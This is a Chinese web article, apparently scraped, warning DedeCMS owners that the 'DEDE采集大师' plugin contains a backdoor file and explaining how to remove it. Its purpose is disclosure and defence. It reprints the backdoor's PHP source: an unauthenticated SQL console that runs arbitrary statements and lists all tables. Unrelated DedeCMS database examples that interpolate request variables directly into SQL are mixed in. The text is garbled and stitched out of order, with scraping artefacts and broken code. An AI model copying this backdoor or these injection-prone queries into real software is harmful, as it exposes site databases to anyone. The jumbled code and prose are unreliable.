DEDE采撷大师官方留后门的删除办法

“;
echo “记录:$j”;
echo “

<?php教程
// Reading copy of the file the article tells site owners to delete. As printed it contains
// typographic quotes and scraping artefacts (for example `emptyempty`), so it will not run as shown.
// Loads the CMS bootstrap relative to this file. No login or session check appears anywhere in
// this listing, which matches the article's statement that the file works without authentication.
require_once(dirname(__file__).”/../include/common.inc.php”);
// NOTE(review): $dopost is never assigned from the request in this listing; presumably the
// bootstrap include registers request parameters as globals — confirm against common.inc.php.
if(emptyempty($dopost))
{
$dopost = “”;
}
// "rename" action: renames dedesql.query.php to arc.sqlquery.class.php (paths are relative to the
// working directory) and prints success or failure. An audit has to look for both file names.
if($dopost==”rename”)
{
if(rename(‘dedesql.query.php’,’arc.sqlquery.class.php’)){
echo “成功!”;
}else{
echo “失败!”;
}
exit();
}
// "viewinfo" action: prints the CREATE TABLE statement of the table named in $tablename.
// $tablename is concatenated into the statement without any validation visible in this listing,
// and the handler is reached without an authentication check in this file.
if($dopost==”viewinfo”)
{
if(emptyempty($tablename))
{
echo “没有指定表名!”;
}
else
{
$dsql->setquery(“show create table
“.$dsql->dbname.”.”.$tablename);
$dsql->execute(‘me’);
$row2 =
$dsql->getarray(‘me’,mysql教程_both);
// Index 1 of the SHOW CREATE TABLE row is the statement text; it is echoed inside <xmp>.
$ctinfo = $row2[1];
echo “<xmp>”.trim($ctinfo).”</xmp>”;
}
exit();
}
// "index" action: regenerates the site home page from the row stored in `#@__homepageset`.
// The output path is built from $row['position'] relative to this file's directory, and the
// target is opened with mode 'w' (truncating it) before the template is rendered into it.
if($dopost==”index”)
{
require_once(dedeinc.’/arc.partview.class.php’);
$envs = $_sys_globals = array();
$envs[‘aid’] = 0;
$pv = new partview();
$row = $pv->dsql->getone(‘select * from
`#@__homepageset`’);
$templet =
str_replace(“{style}”,$cfg_df_style,$row[‘templet’]);
$homefile = dirname(__file__).’/’.$row[‘position’];
$homefile =
str_replace(“//”,”/”,str_replace(“”,”/”,$homefile));
$fp = fopen($homefile,’w’) or
die(“无法更新网站主页到:$homefile 位置”);
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.’/’.$templet;
$pv->settemplet($tpl);
$pv->savetohtml($homefile);
$pv->close();
echo “成功更新首页!”;
exit();
}
// "query" action: runs the SQL text supplied in $sqlquery against the site database.
// This is the part the article describes as allowing query, update and delete without login.
else if($dopost==”query”)
{
$sqlquery =
trim(strips教程lashes($sqlquery));
// The only restriction is a case-insensitive pattern match on "drop ... table" and
// "drop ... database"; every other statement type is passed to the database unchanged.
// eregi() and split() used below were removed in PHP 7, which dates this code.
if(eregi(“drop(.*)table”,$sqlquery)
||eregi(“drop(.*)database”,$sqlquery))
{
echo “<span
style=’font-size:10pt’>删除’数据表’或’数据库教程’的语句不允许在这里执行。</span>”;
exit();
}
// Statements starting with "select " are executed and at most 100 rows are printed.
if(eregi(“^select “,$sqlquery))
{
$dsql->setquery($sqlquery);
$dsql->execute();
if($dsql->gettotalrow()<=0)
{
echo “运行sql:{$sqlquery},无返回记录!”;
}
else
{
echo
“运行sql:{$sqlquery},共有”.$dsql->gettotalrow().”条记录,最大返回100条!”;
}
$j = 0;
while($row = $dsql->getarray())
{
$j++;
if($j>100)
{
break;
}
echo “<hr size=1 width=’100%’/>”;
echo “记录:$j”;
echo “<hr size=1 width=’100%’/>”;
// Column names and values are written into the page without HTML escaping.
foreach($row as $k=>$v)
{
echo “<font color=’red’>{$k}:</font>{$v}<br/>rn”;
}
}
exit();
}
// querytype 2 ("multi-line" in the form): the text is split into statements on a semicolon
// followed by a line break, and each non-empty statement is executed as a non-query.
if($querytype==2)
{
$sqlquery = str_replace(“r”,””,$sqlquery);
$sqls = split(“;[ t]{0,}n”,$sqlquery);
$nerrcode = “”;$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q==””)
{
continue;
}
$dsql->executenonequery($q);
$errcode = trim($dsql->geterror());
// $i counts statements that produced no error text; failures are collected in $nerrcode.
if($errcode==””)
{
$i++;
}
else
{
$nerrcode .= “执行: <font color=’blue’>$q</font>
出错,错误提示:<font
color=’red’>”.$errcode.”</font><br>”;
}
}
echo “成功执行{$i}个sql语句!<br><br>”;
echo $nerrcode;
}
// Any other querytype: the whole text is executed as one statement. The success message is
// printed unconditionally, followed by whatever error text the database layer returned.
else
{
$dsql->executenonequery($sqlquery);
$nerrcode = trim($dsql->geterror());
echo “成功执行1个sql语句!<br><br>”;
echo $nerrcode;
}
exit();
}
// "view" action: prints the HTML front end for the handlers above. Both forms post back to this
// same file (empty action) into the "stafrm" iframe, the first with dopost=viewinfo (switched by
// the buttons' onclick handlers) and the second with dopost=query. The page title and the form
// field names in this markup are what a response from the file looks like.
if($dopost==”view”)
{
;echo ‘<html>
<head>
<meta http-equiv=’content-type’ content=’text/html;
charset=gb2312′>
<title>sql命令行工具</title>
<link
href=’img/base.css教程’
rel=’stylesheet’ type=’text/css’>
</head>
<body background=’img/allbg.gif’ leftmargin=’8′ topmargin=’8′>
<table width=”98%” border=”0″ align=”center” cellpadding=”3″
cellspacing=”1″ bgcolor=”#d1ddaa”>
<tr>
<td height=”19″ background=”img/tbg.gif”>
<table width=”96%” border=”0″ cellspacing=”1″ cellpadding=”1″>
<tr>
<td
width=”24%”><strong>sql命令运行器:</strong></td>
<td width=”76%” align=”right”> <b><a
href=”sys_data.php”><u>数据备份</u></a></b>
| <b><a
href=”sys_data_revert.php”><strong><u>数据还原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height=”200″ bgcolor=”#ffffff” valign=”top”>
<table width=”100%” border=”0″ cellspacing=”4″
cellpadding=”2″>
<form action=”” method=”post” name=”infoform” target=”stafrm”>
<input type=’hidden’ name=’dopost’ value=’viewinfo’ />
<tr bgcolor=”#f3fbec”>
<td width=”15%” height=”24″
align=”center”>系统的表信息:</td>
<td>
<table width=”100%” border=”0″ cellspacing=”0″
cellpadding=”0″>
<tr>
<td width=”35%”>
<select name=”tablename” id=”tablename” style=”width:100%”
size=”6″>
‘;
// Fills the <select> with every table in the database together with its row count, so the
// rendered page discloses the full table list and table sizes.
$dsql->setquery(“show tables”);
$dsql->execute(‘t’);
while($row = $dsql->getarray(‘t’,mysql_both))
{
// One count(*) query per table; $row[0] is the table name returned by "show tables".
$dsql->setquery(“select count(*) from “.$row[0]);
$dsql->execute(‘n’);
$row2 = $dsql->getarray(‘n’,mysql_both);
$dd = $row2[0];
echo ” <option
value='”.$row[0].”‘>”.$row[0].”(“.$dd.”)</option>rn”;
}
// Remainder of the page: the table-maintenance buttons and the free-form SQL textarea.
;echo ‘ </select>
</td>
<td width=”2%”> </td>
<td width=”63%” valign=”bottom”>
<div style=”float:left;margin-right:20px;”>
<input type=”submit” name=”submit1″ value=”优化选中表”
class=”coolbg np” onclick=”this.form.dopost.value=’opimize’;” />
<br />
<input type=”submit” name=”submit2″ value=”修复选中表”
class=”coolbg np” onclick=”this.form.dopost.value=’repair’;”
style=”margin-top:6px;” />
<br />
<input type=”submit” name=”submit3″ value=”查看表结构”
class=”coolbg np” onclick=”this.form.dopost.value=’viewinfo’;”
style=”margin-top:6px;” />
</div>
<div style=”float:left”>
<input type=”submit” name=”submit5″ value=”优化全部表”
class=”coolbg np” onclick=”this.form.dopost.value=’opimizeall’;”
/>
<br />
<input type=”submit” name=”submit6″ value=”修复全部表”
class=”coolbg np” onclick=”this.form.dopost.value=’repairall’;”
style=”margin-top:6px;” />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height=”200″ align=”center”>返回信息:</td>
<td>
<iframe name=”stafrm” frameborder=”0″ id=”stafrm” width=”100%”
height=”100%”></iframe>
</td>
</tr>
</form>
<form action=”” method=”post” name=”form1″ target=”stafrm”>
<input type=’hidden’ name=’dopost’ value=’query’>
<tr>
<td height=”24″ colspan=”2″
bgcolor=”#f3fbec”><strong>运行sql命令行:
<input name=”querytype” type=”radio” class=”np” value=”0″>
单行命令(支持简单查询)
<input name=”querytype” type=”radio” class=”np” value=”2″
checked>
多行命令</strong></td>
</tr>
<tr>
<td height=”118″ colspan=”2″>
<textarea name=”sqlquery” cols=”60″ rows=”10″ id=”sqlquery”
style=”width:90%”></textarea>
</td>
</tr>
<tr>
<td height=”53″ align=”center”> </td>
<td>
<input name=”imagefield” type=”image” src=”img/button_ok.gif”
width=”60″ height=”22″ border=”0″ class=’np’ />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
‘;}
?>

关闭数据库

系统的表信息:

/////////////////////////////////////Delete one record///////////////////////////
// NOTE(review): $aid is interpolated into the statement exactly as it arrives; this snippet shows
// no validation or escaping, so confirm the caller casts it to an integer before this point.
$sql = “Delete From dede_member_flink where aid=’$aid’ And
mid='”.$cfg_ml->M_ID.”‘;”;
$dsql->SetQuery($sql);
$dsql->ExecNoneQuery();
//Or use the shorthand form, passing the statement directly
$dsql->ExecNoneQuery(“Delete From dede_member_flink where
aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;”);
///////////////////////////////////////////////////////////////////////////////

去除官方后门方法:安装好采集大师后,请立即删除 include 目录下的 dedesql.query.php 文件;如果之前已经安装过,该文件有可能已被改名为 arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。由于该文件在被删除之前任何人都可以访问,删除之后还应检查 Web 访问日志中对这两个文件名的请求,并重置后台管理员密码。大家也可以自己测试一下是否如我所说,方法:

输入以上网址,即可打开后门界面。
说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下:
复制代码 代码如下:
// Second printing of the same file's opening lines. `apizl_file` and `emptyempty` look like
// scraping artefacts, so this copy will not run as shown.
// Loads the CMS bootstrap; no login or session check follows in the lines visible here.
require_once(dirname(apizl_file).”/../include/common.inc.php”);
if(emptyempty($dopost))
{
$dopost = “”;
}
// "rename" action: renames dedesql.query.php to arc.sqlquery.class.php and prints the outcome,
// which is why the article says an installed copy may exist under either name.
if($dopost==”rename”)
{
if(rename(‘dedesql.query.php’,’arc.sqlquery.class.php’)){
echo “成功!”;
}else{
echo “失败!”;
}
exit();
}
if($dopost==”viewinfo”)
{
if(emptyempty($tablename))
{
echo “没有指定表名!”;
}
else
{
$dsql->SetQuery(“SHOW CREATE TABLE
“.$dsql->dbName.”.”.$tablename);
$dsql->Execute(‘me’);
$row2 = $dsql->GetArray(‘me’,MYSQL_BOTH);
$ctinfo = $row2[1];
echo “

// Inserts one row into dede_member_flink.
// NOTE(review): $title, $url and the other values are interpolated into the statement as-is;
// this snippet shows no escaping, so verify they are escaped before the query is built.
$sql = “
INSERT INTO
`dede_member_flink`(mid,title,url,linktype,imgurl,imgwidth,imgheight)
VALUES(“.$cfg_ml->M_ID.”,’$title’,’$url’,’$linktype’,’$imgurl’,’$imgwidth’,’$imgheight’);”;//row to insert into the database
$dsql->SetQuery($sql);//set the query text
$dsql->ExecNoneQuery();//run the SQL statement

“;
echo $nerrCode;
}
exit();
}
if($dopost==”view”)
{
;echo ‘

<?php
/*
DedeCms database usage examples
*/
// NOTE(review): dirname() returns a path without a trailing separator, so this concatenation
// yields "<dir>pub_db_mysql.php"; a "/" before the file name appears to be missing.
require_once
dirname(__FILE__).”pub_db_mysql.php”;//include the database class file

 

/////////////////////////////
// Updates one row of dede_member_flink and prints success or failure from the return value.
// NOTE(review): every value, including $aid, is interpolated into the statement as-is; this
// snippet shows no escaping or integer cast, so verify that happens before the query is built.
$upquery = ” Update dede_member_flink set
title=’$title’,url=’$url’,linktype=’$linktype’,
imgurl=’$imgurl’,imgwidth=’$imgwidth’,imgheight=’$imgheight’
where aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;
“;
$rs = $dsql->ExecuteNoneQuery($upquery);
if($rs){
echo “成功”;
}else{
echo “失败”;
}

SQL命令行工具

// Fetches a single row and prints its id column.
// NOTE(review): $aid is used unquoted in a numeric position, so any non-integer content becomes
// part of the statement; cast it to an integer before this call.
$row = $dsql->GetOne(“Select * From dede_* where id = $aid”);
echo $row[‘id’];

<>

/////////////////////////////
// Updates one row of dede_member_flink and prints success or failure from the return value.
// NOTE(review): the values are interpolated into the statement as-is; this snippet shows no
// escaping, so verify that happens before the query is built.
$upquery = ” Update dede_member_flink set
title=’$title’,url=’$url’,linktype=’$linktype’,
imgurl=’$imgurl’,imgwidth=’$imgwidth’,imgheight=’$imgheight’
where aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;
“;
$rs = $dsql->ExecuteNoneQuery($upquery);
if($rs){
echo “成功”;
}else{
echo “失败”;
}
//////////////////////////////////Get the row count//////////////////////////////////
// NOTE(review): this example queries the admin table with $userid and $uname interpolated
// directly into the statement; both need escaping before they reach this point.
$dsql = new DedeSql(false);
$dsql->SetQuery(“Select * from `dede_admin` where
userid=’$userid’ Or uname=’$uname'”);
$dsql->Execute();
$ns = $dsql->GetTotalRow();
////////////////////////////////Close the database///////////////////////////////////
$dsql->Close();
///////////////////////////////////////////////////////////////////////////////
?>

“;
foreach($row as $k=>$v)
{
echo “{$k}:{$v}
rn”;
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace(“r”,””,$sqlquery);
$sqls = split(“;[ t]{0,}n”,$sqlquery);
$nerrCode = “”;$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q==””)
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode==””)
{
$i++;
}
else
{
$nerrCode .= “执行: $q 出错,错误提示:”.$errCode.”
“;
}
}
echo “成功执行{$i}个SQL语句!

///////////////////////////////////////////////////////////////////////////////


获取一条记录的内容


删除一条记录

多行命令**

将查询的若干条记录输出dedecms5

数据备份
| [数据还原]()

// Lists the top-level, visible channels from dede_arctype ordered by sortrank and builds one
// link per row; the statement itself contains no interpolated variables.
$dsql->SetQuery(“Select id,typename From `dede_arctype` where
reid=0 And channeltype=1 And ishidden=0 And ispart<>2 order by
sortrank”);
$dsql->Execute();
while($row=$dsql->GetObject())
{
// NOTE(review): typename is written into the markup without HTML escaping; confirm the stored
// value is trusted or escape it on output.
   $channellist .= “<a
href=’wap.php?action=list&id={$row->id}’>{$row->typename}</a>
“;
       echo $row->id;
}

SQL命令运行器:

更新一条记录

 

//////////////////////////////Insert one record///////////////////////////////
// NOTE(review): $title, $url and the other values are interpolated into the statement as-is;
// this snippet shows no escaping, so verify they are escaped before the query is built.
$sql = “
INSERT INTO
`dede_member_flink`(mid,title,url,linktype,imgurl,imgwidth,imgheight)
VALUES(“.$cfg_ml->M_ID.”,’$title’,’$url’,’$linktype’,’$imgurl’,’$imgwidth’,’$imgheight’);”;//row to insert into the database
$dsql->SetQuery($sql);//set the query text
$dsql->ExecNoneQuery();//run the SQL statement
///////////////////////////////////////////////////////////////////////////////
